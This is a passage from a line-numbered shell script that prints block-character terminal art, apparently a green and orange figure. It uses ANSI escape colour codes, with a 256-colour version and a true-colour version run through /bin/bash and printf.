\e[38;5;65m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;237m▄\e[0m
    286                 \e[38;5;232m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m            \e[48;5;65m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m         \e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;234m▀\e[38;5;239m▀\e[0m
    287                    \e[38;5;234m▀\e[38;5;236m▀\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m                \e[38;5;65m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;65m\e[38;5;243m▄\e[0m\e[38;5;233m▀\e[38;5;235m▀\e[0m
    288                         \e[38;5;242m▀\e[38;5;233m▀\e[38;5;232m▀\e[38;5;234m▀\e[38;5;236m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;65m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;237m▄\e[48;5;237m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;232m▀\e[38;5;232m▀\e[38;5;59m▀\e[0m
    289 '";
    290   else
    291     if [ -f "/bin/bash" ]; then
    292     /bin/bash -c "printf '
    293                             \e[38;2;26;43;21m▄\e[38;2;58;91;50m▄\e[48;2;116;117;116m\e[38;2;68;119;56m▄\e[48;2;98;98;98m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[0m\e[38;2;38;67;32m▄\e[38;2;20;35;16m▄\e[38;2;10;20;8m▄\e[38;2;15;21;13m▄\e[0m
    294                     \e[38;2;49;80;41m▄\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[0m\e[38;2;70;125;56m▄\e[0m
    295              \e[38;2;42;65;36m▄\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[0m
    296          \e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[0m\e[38;2;99;149;87m▄\e[0m
    297          \e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m
    298          \e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m
    299          \e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m \e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m
    300          \e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m \e[0m
    301          \e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m
    302          \e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m
    303          \e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m
    304          \e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[48;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m
    305          \e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m
    306          \e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m
